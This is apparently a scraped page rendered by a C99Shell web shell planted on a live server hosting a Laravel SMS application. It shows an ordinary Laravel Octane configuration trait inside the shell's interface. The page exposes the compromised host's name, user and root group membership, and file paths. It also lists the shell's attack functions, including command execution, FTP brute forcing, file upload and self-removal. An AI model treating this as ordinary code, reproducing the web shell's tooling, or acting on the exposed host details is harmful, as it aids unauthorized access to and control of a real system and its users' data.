!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/vendor/laravel/octane/src/Concerns/   drwxr-xr-x
Free 28.81 GB of 117.98 GB (24.42%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ProvidesDefaultConfigurationOptions.php (4.14 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Laravel\Octane\Concerns;

trait 
ProvidesDefaultConfigurationOptions
{
    
/**
     * Get the listeners that will prepare the Laravel application for a new request.
     */
    
public static function prepareApplicationForNextRequest(): array
    {
        return [
            
\Laravel\Octane\Listeners\FlushLocaleState::class,
            
\Laravel\Octane\Listeners\FlushQueuedCookies::class,
            
\Laravel\Octane\Listeners\FlushSessionState::class,
            
\Laravel\Octane\Listeners\FlushAuthenticationState::class,
            
\Laravel\Octane\Listeners\EnforceRequestScheme::class,
            
\Laravel\Octane\Listeners\EnsureRequestServerPortMatchesScheme::class,
            
\Laravel\Octane\Listeners\GiveNewRequestInstanceToApplication::class,
            
\Laravel\Octane\Listeners\GiveNewRequestInstanceToPaginator::class,
        ];
    }

    
/**
     * Get the listeners that will prepare the Laravel application for a new operation.
     */
    
public static function prepareApplicationForNextOperation(): array
    {
        return [
            
\Laravel\Octane\Listeners\CreateConfigurationSandbox::class,
            
\Laravel\Octane\Listeners\CreateUrlGeneratorSandbox::class,
            
\Laravel\Octane\Listeners\GiveNewApplicationInstanceToAuthorizationGate::class,
            
\Laravel\Octane\Listeners\GiveNewApplicationInstanceToBroadcastManager::class,
            
\Laravel\Octane\Listeners\GiveNewApplicationInstanceToDatabaseManager::class,
            
\Laravel\Octane\Listeners\GiveNewApplicationInstanceToDatabaseSessionHandler::class,
            
\Laravel\Octane\Listeners\GiveNewApplicationInstanceToFilesystemManager::class,
            
\Laravel\Octane\Listeners\GiveNewApplicationInstanceToHttpKernel::class,
            
\Laravel\Octane\Listeners\GiveNewApplicationInstanceToLogManager::class,
            
\Laravel\Octane\Listeners\GiveNewApplicationInstanceToMailManager::class,
            
\Laravel\Octane\Listeners\GiveNewApplicationInstanceToNotificationChannelManager::class,
            
\Laravel\Octane\Listeners\GiveNewApplicationInstanceToPipelineHub::class,
            
\Laravel\Octane\Listeners\GiveNewApplicationInstanceToCacheManager::class,
            
\Laravel\Octane\Listeners\GiveNewApplicationInstanceToSessionManager::class,
            
\Laravel\Octane\Listeners\GiveNewApplicationInstanceToQueueManager::class,
            
\Laravel\Octane\Listeners\GiveNewApplicationInstanceToRouter::class,
            
\Laravel\Octane\Listeners\GiveNewApplicationInstanceToValidationFactory::class,
            
\Laravel\Octane\Listeners\GiveNewApplicationInstanceToViewFactory::class,
            
\Laravel\Octane\Listeners\FlushDatabaseRecordModificationState::class,
            
\Laravel\Octane\Listeners\FlushDatabaseQueryLog::class,
            
\Laravel\Octane\Listeners\RefreshQueryDurationHandling::class,
            
\Laravel\Octane\Listeners\FlushArrayCache::class,
            
\Laravel\Octane\Listeners\FlushLogContext::class,
            
\Laravel\Octane\Listeners\FlushMonologState::class,
            
\Laravel\Octane\Listeners\FlushStrCache::class,
            
\Laravel\Octane\Listeners\FlushTranslatorCache::class,
            
\Laravel\Octane\Listeners\FlushVite::class,

            
// First-Party Packages...
            
\Laravel\Octane\Listeners\PrepareInertiaForNextOperation::class,
            
\Laravel\Octane\Listeners\PrepareLivewireForNextOperation::class,
            
\Laravel\Octane\Listeners\PrepareScoutForNextOperation::class,
            
\Laravel\Octane\Listeners\PrepareSocialiteForNextOperation::class,
        ];
    }

    
/**
     * Get the container bindings / services that should be pre-resolved by default.
     */
    
public static function defaultServicesToWarm(): array
    {
        return [
            
'auth',
            
'cache',
            
'cache.store',
            
'config',
            
'cookie',
            
'db',
            
'db.factory',
            
'db.transactions',
            
'encrypter',
            
'files',
            
'hash',
            
'log',
            
'router',
            
'routes',
            
'session',
            
'session.store',
            
'translator',
            
'url',
            
'view',
        ];
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0046 ]--